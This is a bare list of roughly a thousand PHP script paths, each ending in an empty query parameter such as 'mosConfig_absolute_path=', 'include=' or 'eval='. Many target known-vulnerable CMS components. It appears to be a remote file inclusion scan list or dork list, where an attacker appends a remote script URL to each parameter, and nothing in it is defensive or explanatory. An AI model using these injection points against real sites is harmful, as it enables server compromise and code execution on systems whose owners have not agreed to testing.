/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=

/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

/extensions/moblog/moblog_lib.php?basedir=

/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=

components/com_performs/performs.php?mosConfig_absolute_path=

modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=

/components/com_smf/smf.php?mosConfig_absolute_path=

/components/com_cpg/cpg.php?mosConfig_absolute_path=

administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=

/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=

inc/cmses/aedating4CMS.php?dir[inc]=

bp_ncom.php?bnrep=

/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=

/jscript.php?my_ms[root]=

/popup_window.php?site_isp_root=

/yabbse/Sources/Packages.php?sourcedir=

/include/main.php?config[search_disp]=true&include_dir=

/include/main.php?config[search_disp]=true&include_dir=

/includes/functions_portal.php?phpbb_root_path=

pagina.php?ir=

home.php?qry=

index3.php?url=

index1.php?action=

press.php?param=

view.php?adresa=

pagina.php?type=

file.php?ki=

gallery.php?seite=

include.php?loader=

index2.php?module=

gallery.php?strona=

general.php?itemnav=

template.php?h=

nota.php?header=

blank.php?ki=

enter.php?base_dir=

index1.php?modo=

general.php?thispage=

view.php?var=

include.php?*[*]*=

layout.php?pagina=

nota.php?pollname=

index3.php?p=

padrao.php?pre=

home.php?pa=

main.php?type=

padrao.php?ir=

*inc*.php?left=

sitio.php?start=

gallery.php?eval=

index2.php?base_dir=

index1.php?op=

*.php?include=

padrao.php?sivu=

enter.php?pagina=

general.php?xlink=

principal.php?recipe=

file.php?pref=

show.php?go=

nota.php?ki=

down*.php?oldal=

layout.php?disp=

standard.php?goto=

index2.php?phpbb_root_path=

path.php?action=

enter.php?chapter=

base.php?incl=

mod*.php?link=

include.php?nivel=

head.php?pollname=

enter.php?mod=

show.php?corpo=

default.php?name=

standard.php?param=

general.php?where=

head.php?*[*]*=

info.php?strona=

principal.php?url=

template.php?str=

home.php?ref=

down*.php?left=

standard.php?url=

main.php?doshow=

press.php?*root*=

view.php?*[*]*=

view.php?second=

index.php?to=

page.php?cmd=

view.php?b=

include.php?loc=

info.php?option=

show.php?x=

template.php?texto=

index3.php?ir=

template.php?second=

print.php?chapter=

file.php?inc=

file.php?cont=

index.php?filepath=

home.php?pr=

view.php?cmd=

index.php?module=

file.php?url=

include.php?chapter=

path.php?my=

principal.php?param=

general.php?menue=

index1.php?b=

info.php?chapter=

nota.php?chapter=

general.php?include=

start.php?addr=

home.php?itemnav=

index1.php?qry=

default.php?read=

view.php?incl=

down*.php?to=

index1.php?loc=

principal.php?viewpage=

index2.php?choix=

page.php?addr=

index1.php?dir=

principal.php?pr=

press.php?seite=

standard.php?seccion=

page.php?goto=

head.php?cmd=

home.php?sec=

home.php?category=

standard.php?cmd=

mod*.php?thispage=

*.php?secc=

base.php?to=

index3.php?chapter=

start.php?seccion=

base.php?middlePart=

view.php?choix=

template.php?panel=

base.php?panel=

template.php?mod=

path.php?menue=

info.php?j=

blank.php?pref=

sub*.php?channel=

padrao.php?secc=

standard.php?in=

general.php?cmd=

pagina.php?panel=

*inc*.php?inc=

template.php?where=

general.php?id=

path.php?channel=

standard.php?pref=

template.php?play=

gallery.php?seccion=

layout.php?my=

page.php?tipo=

sitio.php?rub=

pagina.php?u=

file.php?ir=

*inc*.php?sivu=

padrao.php?seite=

press.php?i=

path.php?start=

mod*.php?tipo=

page.php?chapter=

home.php?recipe=

gallery.php?ref=

enter.php?pname=

press.php?inc=

layout.php?path=

print.php?open=

mod*.php?channel=

down*.php?phpbb_root_path=

*inc*.php?str=

gallery.php?phpbb_root_path=

include.php?middlePart=

sub*.php?destino=

index2.php?left=

view.php?phpbb_root_path=

info.php?read=

base.php?k=

home.php?sp=

index3.php?pag=

down*.php?OpenPage=

sitio.php?strona=

nota.php?seite=

main.php?strona=

sitio.php?get=

sitio.php?index=

index3.php?option=

index.php?basepath=

enter.php?a=

main.php?second=

info.php?in=

print.php?pname=

start.php?where=

blank.php?itemnav=

default.php?n=

down*.php?filepath=

blank.php?pagina=

main.php?corpo=

principal.php?filepath=

view.php?option=

index1.php?d=

show.php?*root*=

principal.php?pre=

start.php?p=

standard.php?home=

down*.php?where=

*inc*.php?include=

enter.php?numero=

path.php?pre=

index2.php?oldal=

general.php?addr=

home.php?loader=

general.php?tipo=

start.php?eval=

index.php?secao=

index.php?disp=

info.php?op=

head.php?mod=

template.php?page=

include.php?sivu=

sitio.php?section=

nota.php?doshow=

home.php?seite=

home.php?a=

index.php?modo=

page.php?url=

show.php?module=

pagina.php?left=

layout.php?c=

sitio.php?texto=

gallery.php?oldal=

press.php?incl=

principal.php?w=

index2.php?pname=

path.php?path=

principal.php?goto=

*inc*.php?category=

standard.php?base_dir=

default.php?pag=

home.php?where=

default.php?pr=

page.php?sivu=

main.php?adresa=

*inc*.php?adresa=

default.php?to=

padrao.php?str=

include.php?my=

default.php?opcion=

show.php?home=

main.php?str=

index.php?load=

index3.php?rub=

sub*.php?str=

path.php?in=

base.php?ev=

principal.php?choix=

start.php?index=

nota.php?mod=

default.php?m=

sub*.php?mid=

include.php?name=

path.php?link=

view.php?pag=

principal.php?my=

index1.php?*[*]*=

pagina.php?oldal=

padrao.php?loc=

path.php?header=

*inc*.php?base_dir=

padrao.php?rub=

principal.php?basepath=

view.php?disp=

page.php?incl=

gallery.php?disp=

head.php?modo=

nota.php?oldal=

include.php?u=

principal.php?pagina=

show.php?left=

gallery.php?url=

sub*.php?*root*=

print.php?choix=

head.php?filepath=

include.php?corpo=

mod*.php?section=

general.php?name=

base.php?disp=

sub*.php?action=

principal.php?module=

head.php?pname=

index.php?inc=

sub*.php?OpenPage=

press.php?dir=

gallery.php?xlink=

mod*.php?to=

show.php?xlink=

file.php?left=

padrao.php?oldal=

sub*.php?lang=

nota.php?destino=

general.php?module=

down*.php?x=

main.php?id=

enter.php?sp=

index2.php?loader=

enter.php?loader=

index3.php?redirect=

down*.php?param=

default.php?ki=

principal.php?disp=

sub*.php?viewpage=

template.php?pre=

mod*.php?goFile=

padrao.php?h=

press.php?second=

padrao.php?read=

base.php?seccion=

mod*.php?cont=

index1.php?l=

down*.php?pr=

gallery.php?viewpage=

template.php?load=

sitio.php?doshow=

*inc*.php?type=

nota.php?pr=

padrao.php?destino=

show.php?filepath=

sitio.php?qry=

general.php?pr=

layout.php?panel=

index2.php?channel=

principal.php?opcion=

pagina.php?go=

start.php?str=

press.php?*[*]*=

default.php?var=

index.php?ev=

pagina.php?pre=

nota.php?content=

include.php?adresa=

sub*.php?corpo=

sitio.php?t=

index.php?sivu=

principal.php?q=

file.php?viewpage=

press.php?itemnav=

mod*.php?ev=

blank.php?OpenPage=

path.php?ev=

print.php?module=

head.php?tipo=

index.php?loc=

nota.php?basepath=

sitio.php?sec=

padrao.php?tipo=

index2.php?in=

default.php?cmd=

blank.php?channel=

mod*.php?j=

principal.php?eval=

layout.php?modo=

head.php?pageweb=

file.php?qry=

path.php?type=

info.php?t=

layout.php?g=

enter.php?play=

general.php?var=

principal.php?s=

standard.php?pagina=

standard.php?subject=

base.php?second=

nota.php?base_dir=

index2.php?showpage=

index3.php?type=

head.php?inc=

pagina.php?basepath=

base.php?cont=

main.php?pname=

mod*.php?chapter=

sitio.php?ev=

home.php?sekce=

sitio.php?sp=

*inc*.php?modo=

nota.php?tipo=

include.php?goto=

file.php?pg=

head.php?g=

general.php?header=

view.php?to=

include.php?middle=

start.php?*root*=

enter.php?pref=

index3.php?open=

start.php?module=

include.php?phpbb_root_path=

main.php?load=

index2.php?include=

enter.php?pg=

nota.php?itemnav=

include.php?option=

index2.php?type=

padrao.php?redirect=

pagina.php?my=

gallery.php?pre=

base.php?link=

path.php?chapter=

show.php?sp=

enter.php?w=

info.php?texto=

enter.php?open=

base.php?rub=

home.php?section=

default.php?y=

gallery.php?*[*]*=

include.php?cmd=

standard.php?dir=

pagina.php?link=

layout.php?page=

index3.php?pageweb=

index1.php?o=

gallery.php?addr=

include.php?numero=

path.php?destino=

index3.php?home=

*inc*.php?menu=

default.php?seite=

path.php?where=

path.php?eval=

pagina.php?home=

base.php?choix=

template.php?cont=

info.php?pagina=

file.php?doshow=

index3.php?pname=

nota.php?in=

default.php?x=

path.php?middlePart=

down*.php?sp=

page.php?module=

default.php?option=

index3.php?ev=

standard.php?eval=

gallery.php?ki=

down*.php?second=

blank.php?path=

pagina.php?v=

path.php?y=

template.php?qry=

start.php?option=

info.php?subject=

page.php?abre=

sub*.php?g=

file.php?pollname=

index3.php?var=

layout.php?goto=

home.php?g=

pagina.php?incl=

home.php?action=

include.php?oldal=

print.php?left=

file.php?play=

print.php?u=

nota.php?v=

home.php?str=

start.php?loader=

press.php?panel=

start.php?showpage=

info.php?ref=

pagina.php?id=

blank.php?name=

page.php?mod=

default.php?param=

down*.php?texto=

head.php?str=

print.php?header=

mod*.php?dir=

index3.php?mid=

down*.php?disp=

blank.php?j=

view.php?where=

path.php?goto=

default.php?type=

blank.php?subject=

mod*.php?incl=

path.php?play=

base.php?l=

path.php?filepath=

gallery.php?base_dir=

show.php?middlePart=

*inc*.php?to=

index2.php?rub=

general.php?opcion=

layout.php?xlink=

home.php?page=

padrao.php?name=

layout.php?z=

pagina.php?nivel=

default.php?oldal=

view.php?seccion=

template.php?k=

sitio.php?*root*=

file.php?strona=

main.php?chapter=

layout.php?chapter=

layout.php?incl=

include.php?url=

base.php?sivu=

index.php?link=

sub*.php?cont=

mod*.php?pag=

info.php?oldal=

index2.php?ref=

general.php?rub=

default.php?str=

head.php?ev=

head.php?sekce=

sub*.php?path=

view.php?page=

layout.php?pref=

main.php?j=

index2.php?basepath=

path.php?doshow=

path.php?panel=

file.php?pagina=

gallery.php?qry=

index2.php?e=

path.php?sp=

main.php?url=

pagina.php?load=

general.php?section=

index.php?include=

base.php?filepath=

default.php?incl=

include.php?content=

show.php?redirect=

blank.php?basepath=

template.php?ref=

index1.php?pre=

head.php?load=

main.php?subject=

general.php?base_dir=

start.php?in=

show.php?abre=

file.php?y=

down*.php?ev=

padrao.php?choix=

index.php?channel=

index1.php?home=

home.php?ev=

nota.php?t=

index2.php?ki=

base.php?pag=

blank.php?panel=

default.php?ir=

sub*.php?header=

info.php?var=

general.php?qry=

index2.php?home=

press.php?nivel=

enter.php?read=

head.php?adresa=

print.php?param=

default.php?sp=

enter.php?pr=

start.php?panel=

template.php?dir=

blank.php?loader=

start.php?cmd=

show.php?pre=

padrao.php?d=

view.php?content=

print.php?strona=

sitio.php?recipe=

principal.php?read=

standard.php?showpage=

main.php?pg=

sitio.php?inc=

page.php?panel=

info.php?header=

press.php?addr=

info.php?itemnav=

template.php?s=

file.php?to=

main.php?tipo=

base.php?itemnav=

standard.php?where=

*inc*.php?ev=

sitio.php?modo=

sitio.php?disp=

print.php?addr=

mod*.php?oldal=

padrao.php?page=

show.php?thispage=

sub*.php?go=

start.php?load=

index2.php?option=

home.php?secao=

blank.php?mod=

index3.php?inc=

main.php?start=

standard.php?my=

enter.php?y=

enter.php?mid=

base.php?pageweb=

padrao.php?*root*=

main.php?action=

pagina.php?path=

press.php?id=

sub*.php?phpbb_root_path=

path.php?home=

index3.php?middle=

main.php?inc=

index3.php?get=

default.php?seccion=

index3.php?cmd=

index.php?pname=

print.php?numero=

include.php?in=

press.php?subject=

include.php?secao=

include.php?sec=

index3.php?xlink=

general.php?texto=

index3.php?go=

sub*.php?sec=

home.php?channel=

base.php?body=

index.php?cmd=

enter.php?ir=

home.php?oldal=

index3.php?disp=

index3.php?left=

sub*.php?middle=

head.php?pag=

general.php?menu=

nota.php?seccion=

path.php?xlink=

show.php?modo=

page.php?mid=

index1.php?link=

blank.php?sp=

index1.php?pagina=

head.php?left=

default.php?panel=

*inc*.php?doshow=

blank.php?id=

print.php?read=

enter.php?phpbb_root_path=

sitio.php?destino=

show.php?z=

start.php?basepath=

principal.php?d=

blank.php?strona=

start.php?name=

default.php?chapter=

template.php?y=

head.php?goto=

page.php?where=

layout.php?category=

index1.php?my=

path.php?qry=

principal.php?phpbb_root_path=

nota.php?channel=

default.php?*root*=

enter.php?cmd=

file.php?include=

enter.php?body=

index.php?chapter=

page.php?choix=

start.php?xlink=

home.php?k=

standard.php?phpbb_root_path=

principal.php?middlePart=

include.php?panel=

mod*.php?m=

default.php?choix=

start.php?oldal=

index.php?recipe=

template.php?path=

down*.php?ir=

pagina.php?dir=

sitio.php?abre=

nota.php?module=

info.php?xlink=

enter.php?lang=

index1.php?recipe=

general.php?redirect=

view.php?recipe=

home.php?ir=

padrao.php?open=

blank.php?page=

sub*.php?category=

*inc*.php?body=

enter.php?middle=

home.php?path=

base.php?subject=

padrao.php?u=

sub*.php?my=

enter.php?type=

down*.php?pre=

base.php?w=

main.php?path=

nota.php?ir=

press.php?link=

blank.php?ir=

page.php?showpage=

home.php?disp=

gallery.php?pollname=

index3.php?secc=

down*.php?open=

down*.php?pageweb=

home.php?panel=

default.php?eval=

index1.php?pr=

main.php?ref=

view.php?showpage=

layout.php?link=

show.php?get=

standard.php?qry=

sitio.php?tipo=

index2.php?thispage=

layout.php?cont=

index3.php?pollname=

default.php?destino=

pagina.php?cmd=

view.php?body=

head.php?rub=

standard.php?include=

padrao.php?seccion=

down*.php?r=

path.php?secao=

press.php?opcion=

gallery.php?tipo=

main.php?param=

standard.php?e=

index1.php?v=

down*.php?in=

pagina.php?secao=

nota.php?include=

sitio.php?secao=

standard.php?secc=

print.php?my=

general.php?abre=

general.php?link=

gallery.php?loader=

index3.php?include=

pagina.php?to=

enter.php?strona=

standard.php?panel=

sub*.php?s=

show.php?channel=

enter.php?get=

path.php?var=

enter.php?r=

general.php?subject=

index3.php?phpbb_root_path=

enter.php?pa=

gallery.php?where=

include.php?header=

head.php?middle=

include.php?mid=

blank.php?incl=

sub*.php?load=

index2.php?corpo=

gallery.php?sp=

show.php?chapter=

sub*.php?b=

index1.php?incl=

home.php?choix=

general.php?adresa=

index1.php?c=

print.php?goto=

index2.php?var=

main.php?pref=

sub*.php?sp=

index1.php?pname=

template.php?doshow=

padrao.php?base_dir=

path.php?incl=

info.php?recipe=

view.php?sec=

file.php?where=

index2.php?my=

print.php?name=

info.php?c=

include.php?w=

start.php?op=

principal.php?cont=

print.php?menue=

info.php?f=

main.php?section=

padrao.php?xlink=

view.php?header=

index1.php?url=

gallery.php?basepath=

layout.php?menue=

head.php?y=

template.php?mid=

sub*.php?id=

sub*.php?content=

show.php?type=

start.php?corpo=

file.php?chapter=

base.php?id=

mod*.php?qry=

home.php?chapter=

standard.php?chapter=

press.php?page=

default.php?strona=

sitio.php?chapter=

nota.php?n=

start.php?adresa=

gallery.php?index=

nota.php?h=

page.php?oldal=

enter.php?panel=

blank.php?t=

default.php?e=

sub*.php?itemnav=

standard.php?go=

start.php?pollname=

sitio.php?menu=

sub*.php?module=

press.php?goFile=

principal.php?id=

enter.php?thispage=

down*.php?incl=

principal.php?z=

main.php?my=

start.php?ir=

mod*.php?index=

info.php?ki=

file.php?loader=

index.php?mid=

sitio.php?r=

down*.php?seite=

sub*.php?play=

index2.php?doshow=

index2.php?chapter=

show.php?path=

base.php?lang=

nota.php?inc=

standard.php?index=

gallery.php?to=

info.php?base_dir=

index1.php?var=

gallery.php?abre=

principal.php?p=

pagina.php?index=

view.php?qry=

home.php?tipo=

page.php?numero=

index1.php?strona=

show.php?inc=

gallery.php?pag=

view.php?channel=

index2.php?redirect=

pagina.php?middlePart=

template.php?base_dir=

default.php?mod=

index.php?op=

info.php?mid=

home.php?module=

general.php?left=

general.php?pre=

print.php?doshow=

general.php?page=

path.php?adresa=

padrao.php?type=

template.php?pag=

standard.php?pre=

blank.php?ref=

down*.php?z=

general.php?inc=

home.php?read=

page.php?seite=

pagina.php?section=

home.php?menu=

default.php?basepath=

index2.php?open=

blank.php?pname=

sub*.php?modo=

index2.php?goto=

path.php?subject=

index.php?pre=

general.php?sivu=

general.php?read=

principal.php?ev=

press.php?to=

main.php?middle=

sitio.php?pageweb=

base.php?seite=

print.php?pollname=

index2.php?strona=

template.php?f=

*inc*.php?j=

index2.php?filepath=

file.php?type=

index1.php?oldal=

template.php?e=

index2.php?second=

press.php?pagina=

print.php?ki=

index3.php?sekce=

page.php?z=

enter.php?left=

info.php?filepath=

head.php?middlePart=

gallery.php?ev=

index3.php?ref=

base.php?opcion=

file.php?id=

path.php?category=

index3.php?start=

print.php?loc=

sitio.php?body=

pagina.php?n=

start.php?rub=

*inc*.php?i=

down*.php?s=

padrao.php?a=

page.php?OpenPage=

gallery.php?option=

mod*.php?sekce=

blank.php?pre=

general.php?channel=

template.php?thispage=

head.php?viewpage=

index2.php?OpenPage=

file.php?incl=

sitio.php?e=

page.php?section=

mod*.php?middle=

page.php?cont=

sub*.php?adresa=

index1.php?goFile=

blank.php?action=

principal.php?loader=

gallery.php?id=

index2.php?pg=

sub*.php?op=

layout.php?thispage=

padrao.php?body=

base.php?t=

main.php?addr=

start.php?mid=

gallery.php?secao=

press.php?redirect=

pagina.php?tipo=

pagina.php?seccion=

layout.php?action=

index.php?w=

sitio.php?option=

head.php?where=

principal.php?tipo=

index2.php?category=

pagina.php?lang=

include.php?ref=

press.php?loader=

gallery.php?showpage=

gallery.php?go=

enter.php?start=

press.php?lang=

general.php?p=

index3.php?thispage=

index.php?sekce=

sub*.php?seite=

index2.php?get=

sitio.php?go=

layout.php?addr=

nota.php?mid=

page.php?p=

mod*.php?corpo=

include.php?cont=

press.php?t=

blank.php?category=

sub*.php?where=

*inc*.php?y=

index3.php?index=

path.php?recipe=

nota.php?category=

info.php?loader=

print.php?sp=

show.php?d=

enter.php?menue=

page.php?phpbb_root_path=

path.php?body=

index1.php?t=

principal.php?menue=

print.php?cont=

pagina.php?z=

nota.php?adresa=

main.php?thispage=

default.php?mid=

layout.php?tipo=

blank.php?xlink=

index3.php?d=

enter.php?b=

main.php?loc=

sub*.php?oldal=

standard.php?z=

general.php?b=

include.php?left=

show.php?base_dir=

sitio.php?middlePart=

template.php?a=

print.php?sivu=

press.php?OpenPage=

page.php?read=

index.php?param=

default.php?channel=

default.php?cont=

sub*.php?link=

general.php?pollname=

padrao.php?texto=

base.php?base_dir=

template.php?nivel=

file.php?texto=

enter.php?page=

file.php?middle=

standard.php?str=

gallery.php?get=

main.php?v=

base.php?middle=

pagina.php?base_dir=

print.php?tipo=

down*.php?subject=

principal.php?pag=

index2.php?loc=

enter.php?sivu=

path.php?option=

nota.php?option=

index.php?strona=

home.php?index=

index1.php?choix=

index2.php?f=

press.php?destino=

print.php?base_dir=

file.php?get=

pagina.php?channel=

principal.php?b=

info.php?content=

home.php?include=

default.php?goto=

default.php?page=

start.php?include=

head.php?numero=

print.php?option=

default.php?v=

base.php?numero=

index2.php?qry=

general.php?ref=

sub*.php?secao=

main.php?dir=

gallery.php?cont=

principal.php?type=

file.php?param=

default.php?secao=

sub*.php?secc=

mod*.php?lang=

path.php?pageweb=

standard.php?pollname=

info.php?r=

default.php?load=

show.php?j=

base.php?phpbb_root_path=

main.php?itemnav=

view.php?pg=

down*.php?pa=

standard.php?open=

pagina.php?choix=

default.php?itemnav=

index2.php?cmd=

file.php?disp=

press.php?xlink=

print.php?s=

layout.php?url=

mod*.php?secc=

index1.php?param=

index.php?path=

index1.php?second=

start.php?modo=

index3.php?sivu=

index1.php?get=

mod*.php?pg=

index3.php?my=

layout.php?cmd=

info.php?phpbb_root_path=

sub*.php?left=

print.php?OpenPage=

print.php?inc=

default.php?thispage=

enter.php?sec=

view.php?type=

path.php?*[*]*=

base.php?adresa=

home.php?middlePart=

index3.php?channel=

index3.php?oldal=

template.php?sekce=

down*.php?goFile=

blank.php?header=

start.php?body=

standard.php?body=

base.php?path=

base.php?module=

default.php?l=

principal.php?strona=

info.php?l=

template.php?left=

index2.php?texto=

home.php?eval=

padrao.php?section=

blank.php?goFile=

head.php?loc=

index.php?index=

page.php?ir=

print.php?path=

layout.php?ir=

blank.php?pollname=

down*.php?path=

include.php?x=

sitio.php?opcion=

pagina.php?category=

start.php?pageweb=

gallery.php?rub=

template.php?sp=

sub*.php?basepath=

press.php?menu=

standard.php?section=

enter.php?abre=

index2.php?pref=

index1.php?pa=

sitio.php?incl=

principal.php?seite=

show.php?ki=

gallery.php?chapter=

nota.php?qry=

pagina.php?pagina=

index3.php?x=

default.php?menu=

page.php?strona=

*inc*.php?open=

index3.php?secao=

standard.php?*[*]*=

default.php?abre=

template.php?basepath=

standard.php?goFile=

index2.php?ir=

file.php?modo=

gallery.php?itemnav=

main.php?oldal=

press.php?pg=

down*.php?showpage=

start.php?nivel=

start.php?destino=

index1.php?filepath=

blank.php?rub=

path.php?ir=

layout.php?var=

padrao.php?op=

mod*.php?pre=

index1.php?texto=

start.php?pg=

default.php?pa=

press.php?strona=

nota.php?cmd=

index1.php?showpage=

info.php?go=

standard.php?abre=

general.php?seccion=

index1.php?itemnav=

layout.php?seite=

path.php?load=

home.php?pollname=

path.php?left=

down*.php?inc=

index3.php?abre=

blank.php?where=

info.php?start=

include.php?channel=

print.php?dir=

page.php?secao=

nota.php?pag=

main.php?disp=

nota.php?second=

print.php?pre=

index2.php?to=

standard.php?name=

padrao.php?cont=

start.php?strona=

padrao.php?menu=

mod*.php?numero=

press.php?home=

path.php?addr=

info.php?z=

mod*.php?path=

blank.php?base_dir=

base.php?sekce=

pagina.php?loader=

page.php?go=

press.php?category=

base.php?texto=

gallery.php?left=

nota.php?secc=

index.php?tipo=

index.php?goto=

print.php?pag=

down*.php?qry=

view.php?secao=

general.php?strona=

show.php?my=

file.php?second=

page.php?e=

padrao.php?index=

include.php?pag=

gallery.php?thispage=

base.php?ir=

start.php?base_dir=

default.php?tipo=

template.php?addr=

gallery.php?panel=

sitio.php?nivel=

standard.php?ev=

include.php?destino=

standard.php?destino=

general.php?middle=

main.php?basepath=

head.php?disp=

standard.php?q=

general.php?w=

gallery.php?sec=

base.php?var=

enter.php?addr=

enter.php?go=

page.php?middle=

start.php?home=

index1.php?tipo=

info.php?rub=

mod*.php?choix=

template.php?ir=

pagina.php?OpenPage=

show.php?adresa=

general.php?mid=

head.php?content=

principal.php?pref=

index3.php?adresa=

pagina.php?sec=

template.php?secao=

home.php?w=

home.php?in=

path.php?disp=

main.php?index=

file.php?eval=

general.php?content=

press.php?base_dir=

sub*.php?recipe=

main.php?category=

main.php?content=

enter.php?viewpage=

show.php?disp=

main.php?ir=

index.php?pg=

show.php?pageweb=

index.php?opcion=

principal.php?ir=

view.php?loader=

down*.php?strona=

default.php?pageweb=

principal.php?seccion=

index.php?oldal=

principal.php?n=

blank.php?link=

file.php?sivu=

head.php?d=

info.php?adresa=

*inc*.php?ki=

gallery.php?mid=

padrao.php?incl=

index.php?type=

main.php?eval=

gallery.php?nivel=

standard.php?j=

sub*.php?goFile=

info.php?sec=

show.php?oldal=

enter.php?link=

enter.php?content=

blank.php?filepath=

standard.php?channel=

main.php?include=

main.php?page=

base.php?*[*]*=

info.php?incl=

down*.php?include=

press.php?modo=

file.php?choix=

home.php?rub=

default.php?k=

index3.php?t=

press.php?type=

blank.php?goto=

index3.php?showpage=

file.php?showpage=

principal.php?subject=

enter.php?home=

start.php?chapter=

show.php?r=

pagina.php?thispage=

general.php?chapter=

info.php?menue=

index.php?middlePart=

blank.php?corpo=

press.php?where=

path.php?p=

page.php?base_dir=

page.php?qry=

show.php?incl=

page.php?*[*]*=

main.php?h=

enter.php?path=

file.php?seccion=

default.php?pre=

principal.php?index=

press.php?ir=

principal.php?inc=

home.php?z=

pagina.php?in=

show.php?play=

nota.php?subject=

index1.php?path=

default.php?secc=

sub*.php?option=

sub*.php?pag=

layout.php?where=

default.php?loader=

info.php?o=

padrao.php?var=

file.php?oldal=

template.php?menue=

press.php?abre=

mod*.php?b=

layout.php?OpenPage=

default.php?showpage=

home.php?play=

sitio.php?pg=

press.php?channel=

pagina.php?ev=

sitio.php?name=

page.php?option=

main.php?filepath=

press.php?mid=

general.php?to=

index1.php?*root*=

show.php?qry=

print.php?where=

down*.php?corpo=

view.php?get=

index2.php?itemnav=

pagina.php?q=

enter.php?str=

enter.php?name=

print.php?thispage=

sitio.php?addr=

principal.php?home=

show.php?param=

standard.php?sivu=

enter.php?incl=

index3.php?mod=

template.php?opcion=

index3.php?panel=

include.php?play=

path.php?cmd=

file.php?sp=

nota.php?pre=

template.php?section=

view.php?str=

blank.php?left=

head.php?lang=

nota.php?lang=

pagina.php?g=

path.php?sivu=

main.php?e=

default.php?ref=

start.php?seite=

default.php?inc=

print.php?disp=

include.php?tipo=

home.php?h=

principal.php?loc=

index3.php?sp=

gallery.php?var=

sub*.php?base_dir=

path.php?middle=

default.php?loc=

principal.php?destino=

pagina.php?str=

index3.php?menue=

base.php?play=

base.php?v=

sitio.php?sivu=

index.php?y=

home.php?opcion=

print.php?middlePart=

main.php?r=

sitio.php?secc=

file.php?nivel=

start.php?sivu=

show.php?read=

standard.php?var=

template.php?c=

info.php?param=

general.php?second=

head.php?start=

sub*.php?mod=

view.php?oldal=

home.php?loc=

mod*.php?play=

head.php?corpo=

gallery.php?h=

standard.php?op=

index2.php?inc=

info.php?pref=

pagina.php?mid=

base.php?basepath=

sub*.php?thispage=

print.php?basepath=

*inc*.php?m=

layout.php?loader=

enter.php?qry=

padrao.php?filepath=

base.php?home=

layout.php?strona=

padrao.php?url=

sitio.php?oldal=

include.php?ir=

pagina.php?read=

sub*.php?u=

base.php?chapter=

index1.php?go=

press.php?pageweb=

standard.php?s=

page.php?eval=

sub*.php?pa=

index.php?j=

pagina.php?pr=

enter.php?texto=

start.php?secao=

home.php?link=

template.php?*[*]*=

gallery.php?action=

base.php?oldal=

nota.php?get=

index3.php?dir=

include.php?ki=

index3.php?link=

home.php?e=

index3.php?body=

gallery.php?name=

nota.php?eval=

standard.php?oldal=

sub*.php?abre=

index2.php?load=

principal.php?in=

view.php?load=

mod*.php?action=

nota.php?showpage=

default.php?p=

general.php?f=

head.php?c=

template.php?viewpage=

view.php?mid=

padrao.php?addr=

padrao.php?pag=

*inc*.php?rub=

index2.php?adresa=

view.php?go=

head.php?sec=

nota.php?filepath=

print.php?link=

gallery.php?pname=

file.php?basepath=

show.php?pname=

home.php?pre=

include.php?goFile=

layout.php?play=

index1.php?subject=

info.php?middlePart=

base.php?loc=

down*.php?pg=

file.php?q=

gallery.php?sivu=

sub*.php?body=

index.php?option=

sub*.php?chapter=

default.php?t=

padrao.php?header=

head.php?opcion=

layout.php?abre=

index3.php?pref=

enter.php?subject=

nota.php?panel=

page.php?modo=

page.php?left=

sitio.php?left=

show.php?include=

base.php?abre=

index3.php?addr=

pagina.php?start=

blank.php?pr=

head.php?choix=

index3.php?tipo=

*inc*.php?get=

print.php?play=

padrao.php?secao=

index.php?str=

general.php?sekce=

show.php?m=

index3.php?choix=

down*.php?channel=

base.php?pa=

head.php?b=

nota.php?sekce=

index1.php?mod=

home.php?showpage=

home.php?cmd=

show.php?l=

index1.php?read=

page.php?load=

general.php?choix=

show.php?index=

blank.php?url=

home.php?my=

start.php?param=

layout.php?sekce=

start.php?thispage=

nota.php?play=

enter.php?module=

mod*.php?secao=

show.php?second=

show.php?n=

start.php?pname=

enter.php?include=

down*.php?doshow=

index2.php?pre=

layout.php?nivel=

home.php?base_dir=

include.php?eval=

principal.php?middle=

standard.php?xlink=

main.php?where=

info.php?home=

padrao.php?link=

general.php?body=

head.php?play=

path.php?strona=

index3.php?read=

file.php?index=

mod*.php?module=

standard.php?viewpage=

mod*.php?OpenPage=

standard.php?pr=

pagina.php?ref=

index.php?b=

principal.php?ki=

sub*.php?panel=

path.php?sec=

path.php?pname=

nota.php?left=

default.php?header=

padrao.php?mid=

info.php?eval=

include.php?path=

padrao.php?qry=

page.php?subject=

file.php?corpo=

padrao.php?strona=

sub*.php?qry=

sub*.php?z=

head.php?module=

nota.php?opcion=

head.php?abre=

pagina.php?include=

page.php?link=

start.php?abre=

print.php?goFile=

*inc*.php?c=

down*.php?cmd=

base.php?str=

home.php?body=

home.php?middle=

gallery.php?module=

sub*.php?open=

include.php?second=

head.php?sivu=

sitio.php?menue=

path.php?tipo=

page.php?inc=

home.php?addr=

pagina.php?header=

mod*.php?v=

home.php?doshow=

padrao.php?n=

gallery.php?pref=

pagina.php?k=

index1.php?chapter=

padrao.php?basepath=

head.php?strona=

general.php?e=

index.php?r=

blank.php?get=

index3.php?seccion=

sitio.php?mid=

index.php?where=

general.php?type=

pagina.php?goto=

page.php?pa=

default.php?menue=

main.php?goto=

index1.php?abre=

blank.php?sivu=

info.php?seccion=

index2.php?pa=

sitio.php?read=

layout.php?pageweb=

nota.php?disp=

index1.php?body=

home.php?thispage=

pagina.php?loc=

layout.php?qry=

print.php?*root*=

show.php?to=

view.php?u=

default.php?nivel=

show.php?header=

down*.php?pag=

view.php?chapter=

start.php?tipo=

standard.php?w=

index.php?open=

blank.php?menu=

principal.php?nivel=

info.php?secao=

general.php?nivel=

padrao.php?nivel=

index.php?var=

nota.php?abre=

standard.php?menu=

index2.php?pollname=

index3.php?path=

home.php?redirect=

index.php?base_dir=

padrao.php?corpo=

down*.php?url=

enter.php?goto=

general.php?secao=

mod*.php?home=

down*.php?addr=

down*.php?section=

sub*.php?j=

principal.php?f=

default.php?index=

sub*.php?menue=

general.php?doshow=

padrao.php?abre=

index2.php?section=

enter.php?seite=

general.php?my=

down*.php?lang=

head.php?loader=

main.php?xlink=

general.php?goto=

include.php?dir=

index3.php?base_dir=

gallery.php?redirect=

